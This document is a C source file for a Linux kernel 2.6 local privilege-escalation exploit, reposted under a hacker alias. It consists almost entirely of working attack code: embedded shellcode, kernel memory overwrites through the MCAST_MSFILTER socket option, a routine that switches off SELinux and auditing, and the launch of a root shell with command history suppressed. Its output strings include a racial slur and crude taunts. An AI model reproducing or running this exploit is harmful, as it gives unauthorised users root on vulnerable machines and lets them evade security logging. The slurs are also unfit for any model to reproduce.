==================================================== kernel-2.6.30 2010 Local Root Exploit ==================================================== Author : Th3 L0rd Dilaw [GarA] Home : Mafia Hack Team & www.Arhack.net Exploit DataBase: 1337day.com Gr33tz : Dr.Sayros & Last breath & Dr.BiLLi & Dr.Milas & O-Snip3r & El Boss Gangster This Local work also on : 2.6.30 .10 /*/ 2.6.30 .1 /*/ 2.6.30 -rc6 /*/ 2.6.30 -rc5 /*/ 2.6.30 -rc3 /*/ 2.6.30 -rc2 /*/ 2.6.30 -rc1 /*/ ==================================================== #include <poll.h> #include <string.h> #include <unistd.h> #include <sys/types.h> #include <stdlib.h> #include <sys/wait.h> #include <sys/utsname.h> #include <sys/socket.h> #include <sched.h> #include <netinet/in.h> #include <stdio.h> #include <sys/stat.h> #include <fcntl.h> #include <sys/mman.h> #include <sys/ipc.h> #include <sys/msg.h> #include <errno.h> #ifndef __i386__ #error "r34d th3 c0d3 m0r0n!!# () #" #else #define _GNU_SOURCE #define __dgdhdytrg55 unsigned int #define __yyrhdgdtfs66ytgetrfd unsigned long long #define __dhdyetgdfstreg__ memcpy #define VERT "\033[32m" #define NORM "\033[0m" #define BANNER VERT"Ac1dB1tCh3z "NORM"VS Linux kernel 2.6 kernel 0d4y\n" #define KALLSYMS "/proc/kallsyms" #define TMAGIC_66TDFDRTS "/proc/timer_list" #define SELINUX_PATH "/selinux/enforce" #define RW_FOPS "timer_list_fops" #define PER_C_DHHDYDGTREM7765 "per_cpu__current_task" #define PREPARE_GGDTSGFSRFSD "prepare_creds" #define OVERRIDE_GGDTSGFSRFSD "override_creds" #define REVERT_DHDGTRRTEFDTD "revert_creds" #define Y0Y0SMAP 0x100000UL #define Y0Y0CMAP 0x200000UL #define Y0Y0STOP (Y0Y0SMAP+0xFFC) #define J0J0S 0x00200000UL #define J0J0R00T 0x002000F0UL #define PAGE_SIZE 0x1000 #define KERN_DHHDYTMLADSFPYT 0x1 #define KERN_DGGDYDTEGGETFDRLAK 0x2 #define KERN_HHSYPPLORQTWGFD 0x4 #define KERN_DIS_GGDYYTDFFACVFD_IDT 0x8 #define KERN_DIS_DGDGHHYTTFSR34353_FOPS 0x10 #define KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM 0x20 #define KERN_DIS_GGSTEYGDTREFRET_SEL1NUX 0x40 #define isRHHGDPPLADSF(ver) (strstr(ver, ".el4") || strstr(ver,".el5")) #define TRY_REMAP_DEFAULT 1 #define __gggdfstsgdt_dddex(f, a...) do { fprintf(stdout, f, ## a); } while(0) #define __pppp_tegddewyfg(s) do { fprintf(stdout, "%s", s); } while(0) #define __xxxfdgftr_hshsgdt(s) do { perror(s); exit(-1); } while(0) #define __yyy_tegdtfsrer(s) do { fprintf(stderr, s); exit(-1); } while(0) static char buffer[1024]; static int s; static int flags=0; volatile static socklen_t magiclen=0; static int useidt=0, usefops=0, uselsm=0; static __yyrhdgdtfs66ytgetrfd _m_fops=0,_m_cred[3] = {0,0,0}; static __dgdhdytrg55 _m_cpu_off=0; static char krelease[64]; static char kversion[128]; #define R0C_0FF 14 static char ttrg0ccc[]= "\x51\x57\x53\x56\x48\x31\xc9\x48\x89\xf8\x48\x31\xf6\xbe\x41\x41\x41\x41" "\x3b\x30\x75\x1f\x3b\x70\x04\x75\x1a\x3b\x70\x08\x75\x15\x3b\x70\x0c" "\x75\x10\x48\x31\xdb\x89\x18\x89\x58\x04\x89\x58\x08\x89\x58\x0c\xeb\x11" "\x48\xff\xc0\x48\xff\xc1\x48\x81\xf9\x4c\x04\x00\x00\x74\x02" "\xeb\xcc\x5e\x5b\x5f\x59\xc3"; #define R0YTTTTUHLFSTT_OFF1 5 #define R0YGGSFDARTDF_DHDYTEGRDFD_D 21 #define R0TDGFSRSLLSJ_SHSYSTGD 45 char r1ngrrrrrrr[]= "\x53\x52\x57\x48\xbb\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd3" "\x50\x48\x89\xc7\x48\xbb\x42\x42\x42\x42\x42\x42\x42\x42" "\xff\xd3\x48\x31\xd2\x89\x50\x04\x89\x50\x14\x48\x89\xc7" "\x48\xbb\x43\x43\x43\x43\x43\x43\x43\x43" "\xff\xd3\x5f\x5f\x5a\x5b\xc3"; #define RJMPDDTGR_OFF 13 #define RJMPDDTGR_DHDYTGSCAVSF 7 #define RJMPDDTGR_GDTDGTSFRDFT 25 static char ttrfd0[]= "\x57\x50\x65\x48\x8b\x3c\x25\x00\x00\x00\x00" "\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd0" "\x58\x5f" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\xc3"; /* implement selinux bypass for IDT ! */ #define RJMPDDTGR_OFF_IDT 14 #define RJMPDDTGR_DYHHTSFDARE 8 #define RJMPDDTGR_DHDYSGTSFDRTAC_SE 27 static char ruujhdbgatrfe345[]= "\x0f\x01\xf8\x65\x48\x8b\x3c\x25\x00\x00\x00\x00" "\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd0" "\x0f\x01\xf8" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x48\xcf"; #define CJE_4554TFFDTRMAJHD_OFF 10 #define RJMPDDTGR_AYYYDGTREFCCV7761_OF 23 static char dis4blens4sel1nuxhayettgdr64545[]= "\x41\x52\x50" "\xb8\x00\x00\x00\x00" "\x49\xba\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x89\x02" "\x49\xba\x42\x42\x42\x42\x42\x42\x42\x42" "\x41\x89\x02" "\x58\x41\x5a"; /* rhel LSM stuffs */ #define RHEL_LSM_OFF 98 struct LSM_rhel { __yyrhdgdtfs66ytgetrfd selinux_ops; __yyrhdgdtfs66ytgetrfd capability_ops; __yyrhdgdtfs66ytgetrfd dummy_security_ops; __yyrhdgdtfs66ytgetrfd selinux_enforcing; __yyrhdgdtfs66ytgetrfd audit_enabled; const char *krelease; const char *kversion; }; struct LSM_rhel known_targets[4]= { { 0xffffffff8031e600ULL, 0xffffffff8031fec0ULL, 0xffffffff804acc00ULL, 0xffffffff804af960ULL, 0xffffffff8049b124ULL, "2.6.18-164.el5", "#1 SMP Thu Sep 3 03:28:30 EDT 2009" // to manage minor/bug fix changes }, { 0xffffffff8031f600ULL, 0xffffffff80320ec0ULL, 0xffffffff804afc00ULL, 0xffffffff804b2960ULL, 0xffffffff8049e124ULL, "2.6.18-164.11.1.el5", "#1 SMP Wed Jan 6 13:26:04 EST 2010" }, { 0xffffffff805296a0ULL, 0xffffffff8052af60ULL, 0xffffffff806db1e0ULL, 0xffffffff806ddf40ULL, 0xffffffff806d5324ULL, "2.6.18-164.11.1.el5xen", "#1 SMP Wed Jan 20 08:06:04 EST 2010" // default xen }, { 0xffffffff8031f600ULL,// d selinux_ops 0xffffffff80320ec0ULL,// d capability_ops 0xffffffff804afc00ULL,// B dummy_security_ops 0xffffffff804b2960ULL,// B selinux_enforcing 0xffffffff8049e124ULL,// B audit_enabled "2.6.18-164.11.1.el5", "#1 SMP Wed Jan 20 07:32:21 EST 2010" // tripwire target LoL } }; static struct LSM_rhel *curr_target=NULL, dyn4nt4n1labeggeyrthryt; struct socketcallAT { int s; int level; int optname; void *optval; volatile socklen_t *optlen; }__attribute__((packed)); struct idt64from32_s { unsigned short limit; unsigned long base; }__attribute__((packed)); static __yyrhdgdtfs66ytgetrfd getidt() { struct idt64from32_s idt; memset(&idt, 0x00, sizeof(struct idt64from32_s)); asm volatile("sidt %0" : "=m"(idt)); return idt.base | 0xFFFFFFFF00000000ULL; } static int isSelinuxEnabled() { FILE *selinux_f; selinux_f = fopen(SELINUX_PATH, "r"); if(selinux_f == NULL) { if(errno == EPERM) return 1; else return 0; } fclose(selinux_f); return 1; } static int wtfyourunhere_heee(char *out_release, char* out_version) { int ret; const char*ptr; int count=0; char r[32], *bptr; struct utsname buf; ret = uname(&buf); if(ret < 0) return -1; strcpy(out_release, buf.release); strcpy(out_version, buf.version); ptr = buf.release; bptr = r; memset(r, 0x00, sizeof(r)); while(*ptr) { if(count == 2) { if(*ptr >= '0' && *ptr <= '9') *bptr++ = *ptr; else break; } if(*ptr == '.') count++; ptr++; } if(strlen(r) < 1 || !atoi(r)) return -1; return atoi(r); } static void p4tch_sel1nux_codztegfaddczda(struct LSM_rhel *table) { *((__yyrhdgdtfs66ytgetrfd *)(dis4blens4sel1nuxhayettgdr64545 + CJE_4554TFFDTRMAJHD_OFF)) = table->selinux_enforcing; *((__yyrhdgdtfs66ytgetrfd *)(dis4blens4sel1nuxhayettgdr64545 + RJMPDDTGR_AYYYDGTREFCCV7761_OF)) = table->audit_enabled; __dhdyetgdfstreg__(ttrfd0 + RJMPDDTGR_GDTDGTSFRDFT, dis4blens4sel1nuxhayettgdr64545, sizeof(dis4blens4sel1nuxhayettgdr64545)-1); __dhdyetgdfstreg__(ruujhdbgatrfe345 + RJMPDDTGR_DHDYSGTSFDRTAC_SE, dis4blens4sel1nuxhayettgdr64545, sizeof(dis4blens4sel1nuxhayettgdr64545)-1); } static __yyrhdgdtfs66ytgetrfd get_sym_ex(const char* s, const char* filename, int ignore_flag) { FILE *ka; char line[512]; char reloc_a[64]; char reloc[64]; if(!(flags & KERN_HHSYPPLORQTWGFD) && !ignore_flag) return 0; ka = fopen(filename, "r"); if(!ka) return 0; while(fgets(line, 512, ka) != NULL) { char *l_p = line; char *ra_p = reloc_a; char *r_p = reloc; memset(reloc, 0x00, sizeof(reloc)); memset(reloc_a, 0x00, sizeof(reloc_a)); while(*l_p != ' ' && (ra_p - reloc_a) < 64) *ra_p++ = *l_p++; l_p += 3; while(*l_p != ' ' && *l_p != '\n' && *l_p != '\t' && (r_p - reloc) < 64) *r_p++ = *l_p++; if(!strcmp(reloc, s)) { __gggdfstsgdt_dddex("$$$ %s->%s\n", s, reloc_a); return strtoull(reloc_a, NULL, 16); } } return 0; } static inline __yyrhdgdtfs66ytgetrfd get_sym(const char* s) { return get_sym_ex(s, KALLSYMS, 0); } static int parse_cred(const char* val) { int i=0; const char* p = val; char local[64], *l; for(i=0; i<3; i++) { memset(local, 0x00, sizeof(local)); l = local; while(*p && *p != ',') *l++ = *p++; if(!(*p) && i != 2) return -1; _m_cred[i] = strtoull(local, NULL, 16); p++; } return 0; } #define SELINUX_OPS "selinux_ops" #define DUMMY_SECURITY_OPS "dummy_security_ops" #define CAPABILITY_OPS "capability_ops" #define SELINUX_ENFORCING "selinux_enforcing" #define AUDIT_ENABLED "audit_enabled" struct LSM_rhel *lsm_rhel_find_target(int check_rhel) { int i; char mapbuf[128]; struct LSM_rhel *lsm = &(known_targets[0]); if(check_rhel && !isRHHGDPPLADSF(krelease)) { __pppp_tegddewyfg("!!! N0t a RH3l k3rn3l \n"); return NULL; } __pppp_tegddewyfg("$$$ L00k1ng f0r kn0wn t4rg3tz.. \n"); for(i=0; i<sizeof(known_targets)/sizeof(struct LSM_rhel); i++, lsm++) { if(!strcmp(krelease, lsm->krelease) && !strcmp(kversion, lsm->kversion)) { __gggdfstsgdt_dddex("$$$ Th1z b1tch 1z t0azt. kn0wn t4rg3t: %s %s \n", lsm->krelease, lsm->kversion); return lsm; } } __pppp_tegddewyfg("$$$ c0mput3r 1z aqu1r1ng n3w t4rg3t...\n"); strcpy(mapbuf, "/boot/System.map-"); strcat(mapbuf, krelease); dyn4nt4n1labeggeyrthryt.selinux_ops = get_sym_ex(SELINUX_OPS, mapbuf, 1); dyn4nt4n1labeggeyrthryt.dummy_security_ops = get_sym_ex(DUMMY_SECURITY_OPS, mapbuf, 1); dyn4nt4n1labeggeyrthryt.capability_ops = get_sym_ex(CAPABILITY_OPS, mapbuf, 1); dyn4nt4n1labeggeyrthryt.selinux_enforcing = get_sym_ex(SELINUX_ENFORCING, mapbuf, 1); dyn4nt4n1labeggeyrthryt.audit_enabled = get_sym_ex(AUDIT_ENABLED, mapbuf, 1); if(!dyn4nt4n1labeggeyrthryt.selinux_ops || !dyn4nt4n1labeggeyrthryt.dummy_security_ops || !dyn4nt4n1labeggeyrthryt.capability_ops || !dyn4nt4n1labeggeyrthryt.selinux_enforcing || !dyn4nt4n1labeggeyrthryt.audit_enabled) return NULL; return &dyn4nt4n1labeggeyrthryt; } static void put_your_hands_up_hooker(int argc, char *argv[]) { int fd,ver,ret; char __b[16]; fd = open(KALLSYMS, O_RDONLY); ret = read(fd, __b, 16); // dummy read if((fd >= 0 && ret > 0)) { __pppp_tegddewyfg("$$$ Kallsyms +r\t\n"); // d0nt p4tch m3 br0 flags |= KERN_HHSYPPLORQTWGFD; } close(fd); ver = wtfyourunhere_heee(krelease, kversion); if(ver < 0) __yyy_tegdtfsrer("!!! Un4bl3 t0 g3t r3l3as3 wh4t th3 fuq!\n"); __gggdfstsgdt_dddex("$$$ K3rn3l r3l3as3: %s\n", krelease); if(argc != 1) { while( (ret = getopt(argc, argv, "siflc:k:o:")) > 0) { switch(ret) { case 'i': flags |= KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM|KERN_DIS_DGDGHHYTTFSR34353_FOPS; useidt=1; // u have to use -i to force IDT Vector break; case 'f': flags |= KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM|KERN_DIS_GGDYYTDFFACVFD_IDT; break; case 'l': flags |= KERN_DIS_GGDYYTDFFACVFD_IDT|KERN_DIS_DGDGHHYTTFSR34353_FOPS; break; case 'c': if(!optarg || parse_cred(optarg) < 0) __yyy_tegdtfsrer("!!! Un4bl3 t0 p4s3 cr3d c0d3z\n"); break; case 'k': if(optarg) _m_fops = strtoull(optarg, NULL, 16); else __yyy_tegdtfsrer("!!! Un4bl3 t0 p4rs3 f0P numb3rs\n"); break; case 's': if(!isSelinuxEnabled()) __pppp_tegddewyfg("??? wh4t th3 fuq s3l1nux 1z n0t 3v3n 3n4bl3d!?\n"); else flags |= KERN_DIS_GGSTEYGDTREFRET_SEL1NUX; break; case 'o': if(optarg) _m_cpu_off = strtoull(optarg, NULL, 16); else __yyy_tegdtfsrer("!!! Un4bl3 t0 p4rs3 f0p c0mput3r numb3rs\n"); break; } } } if(ver >= 29) // needs cred structure { flags |= KERN_DGGDYDTEGGETFDRLAK; if(!_m_cred[0] || !_m_cred[1] || !_m_cred[2]) { _m_cred[0] = get_sym(PREPARE_GGDTSGFSRFSD); _m_cred[1] = get_sym(OVERRIDE_GGDTSGFSRFSD); _m_cred[2] = get_sym(REVERT_DHDGTRRTEFDTD); } if(!_m_cred[0] || !_m_cred[1] || !_m_cred[2]) { __yyy_tegdtfsrer("!!! Err0r 1n s3tt1ng cr3d sh3llc0d3z\n"); } __pppp_tegddewyfg("$$$ Kernel Credentials detected\n"); *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0YTTTTUHLFSTT_OFF1)) = _m_cred[0]; *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0YGGSFDARTDF_DHDYTEGRDFD_D)) = _m_cred[1]; *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0TDGFSRSLLSJ_SHSYSTGD)) = _m_cred[2]; } if(ver >= 30) // needs cpu offset { flags |= KERN_DHHDYTMLADSFPYT; if(!_m_cpu_off) _m_cpu_off = (__dgdhdytrg55)get_sym(PER_C_DHHDYDGTREM7765); if(!_m_cpu_off) __yyy_tegdtfsrer("!!! Err0r 1n s3tt1ng cr3d sh3llc0d3z\n"); __pppp_tegddewyfg("$$$ K3rn3l per_cpu r3l0cs 3n4bl3d!\t\n"); *((__dgdhdytrg55 *)(ttrfd0 + RJMPDDTGR_DHDYTGSCAVSF)) = _m_cpu_off; *((__dgdhdytrg55 *)(ruujhdbgatrfe345 + RJMPDDTGR_DYHHTSFDARE)) = _m_cpu_off; } } static void env_prepare(int argc, char* argv[]) { put_your_hands_up_hooker(argc, argv); if(!(flags & KERN_DIS_DGDGHHYTTFSR34353_FOPS)) // try fops { __pppp_tegddewyfg("??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d\n"); if(!_m_fops) _m_fops = get_sym(RW_FOPS); /* TODO: do RW check for newer -mm kernels which has timer_list_struct RO * Thanks to the guy who killed this vector... you know who you are:) * Lucky for you, there are more:) */ if(_m_fops) { usefops=1; __pppp_tegddewyfg("$$$ w34p0n 0f ch01c3: F0PZzZzzz\n"); } } if(!usefops && !(flags & KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM)) // try lsm(rhel) { curr_target = lsm_rhel_find_target(1); if(!curr_target) { __pppp_tegddewyfg("!!! u4bl3 t0 f1nd t4rg3t!? W3'll s33 ab0ut th4t!\n"); } else uselsm=1; } if(useidt && (flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX)) { // -i flag curr_target = lsm_rhel_find_target(0); if(!curr_target) { __pppp_tegddewyfg("!!! Un4lb3 t0 f1nd t4rg3t: c0ntinu3 w1th0ut s3linsux d1s4bl3.\n"); /* remove Selinux Flag */ flags &= ~KERN_DIS_GGSTEYGDTREFRET_SEL1NUX; } } if(!usefops && !useidt && !uselsm) __yyy_tegdtfsrer("!!! 3v3ryth3ng f41l3d!!*@&^@&*^ () * try an0th3r 0d4y L0l\n"); } static inline int get_socklen(__yyrhdgdtfs66ytgetrfd addr, __dgdhdytrg55 stack) { int socklen_l = 8 + stack - addr - 16; return socklen_l; } static struct socketcallAT at; static __dgdhdytrg55 idtover[4] = {0x00100000UL, 0x0020ee00UL, 0x00000000UL, 0x00000000UL}; static void fillsocketcallAT() { at.s = s; at.level = SOL_IP; at.optname = MCAST_MSFILTER; at.optval = buffer; at.optlen = &magiclen; } static void bitch_call(struct socketcallAT *at, void *stack) { asm volatile( "push %%ebx\t\n" "push %%esi\t\n" "push %%ecx\t\n" "push %%edx\t\n" "movl $0x66, %%eax\t\n" "movl $0xf, %%ebx\t\n" "movl %%esp, %%esi\t\n" "movl %0, %%ecx\t\n" "movl %1, %%esp\t\n" "int $0x80\t\n" "movl %%esi, %%esp\t\n" "pop %%edx\t\n" "pop %%ecx\t\n" "pop %%esi\t\n" "pop %%ebx\t\n" : : "r"(at), "r"(stack) : "memory", "eax", "ecx", "ebx", "esi" ); } static void __setmcbuffer(__dgdhdytrg55 value) { int i; __dgdhdytrg55 *p = (__dgdhdytrg55*)buffer; for(i=0; i<sizeof(buffer)/sizeof(void*); i++) *(p+i) = value; } static void idt_smash(__yyrhdgdtfs66ytgetrfd idtbase) { int i; __dgdhdytrg55 curr; for(i=0; i<sizeof(idtover)/sizeof(idtover[0]);i++) { curr = idtover[i]; __setmcbuffer(curr); magiclen = get_socklen(idtbase + (i*4), Y0Y0STOP); bitch_call(&at, (void*)Y0Y0STOP); } } static void y0y0stack() { void* map = mmap((void*)Y0Y0SMAP, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, -1,0); if(MAP_FAILED == map) __xxxfdgftr_hshsgdt("mmap"); } static void y0y0code() { void* map = mmap((void*)Y0Y0CMAP, PAGE_SIZE, #ifdef TRY_REMAP_DEFAULT PROT_READ|PROT_WRITE, #else PROT_READ|PROT_WRITE|PROT_EXEC, #endif MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, -1,0); if(MAP_FAILED == map) __xxxfdgftr_hshsgdt("mmap"); } static int rey0y0code(unsigned long old) { int fd; void *map; volatile char wizard; char cwd[1024]; getcwd(cwd, sizeof(cwd)); strcat(cwd, "/__tmpfile"); unlink(cwd); fd = open(cwd, O_RDWR|O_CREAT, S_IRWXU); if(fd < 0) return -1; write(fd, (const void*)old, PAGE_SIZE); if(munmap((void*)old, PAGE_SIZE) < 0) return -1; map = mmap((void*)old, PAGE_SIZE, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, fd,0); if(map == MAP_FAILED) return -1; /* avoid lazy page fault handler * Triple Fault when using idt vector * and no pages are already mapped:) */ wizard = *((char*)old); unlink(cwd); return wizard; } int main(int argc, char*argv[]) { int uid,fd; __yyrhdgdtfs66ytgetrfd *patch, idtb; struct pollfd pfd; printf(BANNER); uid = getuid(); env_prepare(argc, argv); y0y0stack(); y0y0code(); if(useidt) { idtb = getidt(); __gggdfstsgdt_dddex("$$$ h0m3 b4s3 addr3ss: %llx\n", idtb); __pppp_tegddewyfg("$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - IDT m3th34d\n"); patch = (__yyrhdgdtfs66ytgetrfd*)(ruujhdbgatrfe345 + RJMPDDTGR_OFF_IDT); *patch = (__yyrhdgdtfs66ytgetrfd)(J0J0R00T); __pppp_tegddewyfg("$$$ Prepare: m0rn1ng w0rk0ut b1tch3z\n"); if(flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX) { __pppp_tegddewyfg("$$$ add1ng sp3c14l c0de t0 rem0v3 s3linux t3rr0r1zt thr34t\n"); p4tch_sel1nux_codztegfaddczda(curr_target); } __dhdyetgdfstreg__((void*)J0J0S, ruujhdbgatrfe345, sizeof(ruujhdbgatrfe345)); } else if(usefops || uselsm) { __pppp_tegddewyfg("$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d\n"); patch = (__yyrhdgdtfs66ytgetrfd*)(ttrfd0 + RJMPDDTGR_OFF); *patch = (__yyrhdgdtfs66ytgetrfd)(J0J0R00T); __setmcbuffer(J0J0S); __pppp_tegddewyfg("$$$ Prepare: m0rn1ng w0rk0ut b1tch3z\n"); if(uselsm && (flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX)) { __pppp_tegddewyfg("$$$ add1ng sp3c14l c0de t0 rem0v3 s3linux t3rr0r1zt thr34t\n"); p4tch_sel1nux_codztegfaddczda(curr_target); } __dhdyetgdfstreg__((void*)J0J0S, ttrfd0, sizeof(ttrfd0)); } /* set shellcode level 2 */ if(flags & KERN_DGGDYDTEGGETFDRLAK) { __pppp_tegddewyfg("$$$ Us1ng cr3d s3ash3llc0d3z\n"); __dhdyetgdfstreg__((void*)J0J0R00T, r1ngrrrrrrr, sizeof(r1ngrrrrrrr)); } else { __pppp_tegddewyfg("$$$ Us1ng st4nd4rd s3ash3llz\n"); __dhdyetgdfstreg__((void*)J0J0R00T, ttrg0ccc, sizeof(ttrg0ccc)); *((unsigned int*)(J0J0R00T + R0C_0FF)) = uid; } __pppp_tegddewyfg("$$$ 0p3n1ng th3 m4giq p0rt4l\n"); s = socket(AF_INET, SOCK_DGRAM, 0); if(s < 0) __xxxfdgftr_hshsgdt("socket"); fillsocketcallAT(); #ifdef TRY_REMAP_DEFAULT if(rey0y0code(Y0Y0CMAP) < 0) __yyy_tegdtfsrer("!!! Un4bl3 t0 r3m4p sh1t\t\n"); #endif if(useidt) { __yyrhdgdtfs66ytgetrfd idtentry = idtb + (2*sizeof(__yyrhdgdtfs66ytgetrfd)*0xdd); __gggdfstsgdt_dddex("$$$ Us1ng 1dt 3ntry: %d\n", 0xdd); idt_smash((idtentry)); sleep(1); asm volatile("int $0xdd\t\n"); } else if(usefops) { magiclen = get_socklen(_m_fops, Y0Y0STOP); magiclen -= 7*sizeof(__yyrhdgdtfs66ytgetrfd); __gggdfstsgdt_dddex("$$$ m4q1c p0rt4l l3n f0und: 0x%x\n", magiclen); __pppp_tegddewyfg("$$$ 0v3r thr0w f0ps g0v3rnm3nt\n"); bitch_call(&at, (void*)Y0Y0STOP); sleep(1); fd = open(TMAGIC_66TDFDRTS, O_RDONLY); if(fd < 0) __xxxfdgftr_hshsgdt("!!! fuq t1m3r_l1st"); pfd.fd = fd; pfd.events = POLLIN | POLLOUT; poll(&pfd, 1, 0); } else if(uselsm) { int msqid; __yyrhdgdtfs66ytgetrfd selinux_msg_off = curr_target->selinux_ops + (8*RHEL_LSM_OFF); __yyrhdgdtfs66ytgetrfd dummy_msg_off = curr_target->dummy_security_ops + (8*RHEL_LSM_OFF); __yyrhdgdtfs66ytgetrfd capability_msg_off = curr_target->capability_ops + (8*RHEL_LSM_OFF); msqid = msgget(0, IPC_PRIVATE|0600); if(msqid < 0) __xxxfdgftr_hshsgdt("!!! fuqqqqqq msgg3t"); magiclen = get_socklen(selinux_msg_off, Y0Y0STOP); __setmcbuffer(J0J0S); bitch_call(&at, (void*)Y0Y0STOP); magiclen = get_socklen(selinux_msg_off+4, Y0Y0STOP); __setmcbuffer(0); bitch_call(&at, (void*)Y0Y0STOP); magiclen = get_socklen(dummy_msg_off, Y0Y0STOP); __setmcbuffer(J0J0S); bitch_call(&at, (void*)Y0Y0STOP); magiclen = get_socklen(dummy_msg_off+4, Y0Y0STOP); __setmcbuffer(0); bitch_call(&at, (void*)Y0Y0STOP); magiclen = get_socklen(capability_msg_off, Y0Y0STOP); __setmcbuffer(J0J0S); bitch_call(&at, (void*)Y0Y0STOP); magiclen = get_socklen(capability_msg_off+4, Y0Y0STOP); __setmcbuffer(0); bitch_call(&at, (void*)Y0Y0STOP); msgctl(msqid, IPC_RMID, (struct msqid_ds *) NULL); // exploit it } munmap((void*)Y0Y0CMAP, PAGE_SIZE); /* exec */ if(getuid() == 0) { pid_t pid; __pppp_tegddewyfg("$$$ bl1ng bl1ng n1gg4 :PppPpPPpPPPpP\n"); pid = fork(); if(pid == 0) { char *args[] = {"/bin/sh", "-i", NULL}; char *envp[] = {"TERM=linux", "BASH_HISTORY=/dev/null", "HISTORY=/dev/null", "history=/dev/null", "HISTFILE=/dev/null", "HISTFILESIZE=0", "PATH=/bin:/sbin:/usr/sbin:/usr/bin:/usr/local/bin:/usr/local/sbin", NULL }; execve("/bin/sh", args, envp); } else { int status; waitpid(pid, &status, 0); } } else __pppp_tegddewyfg("!!! y0u fuq1ng f41l. g3t th3 fuq 0ut!\n"); close(s); return 0; }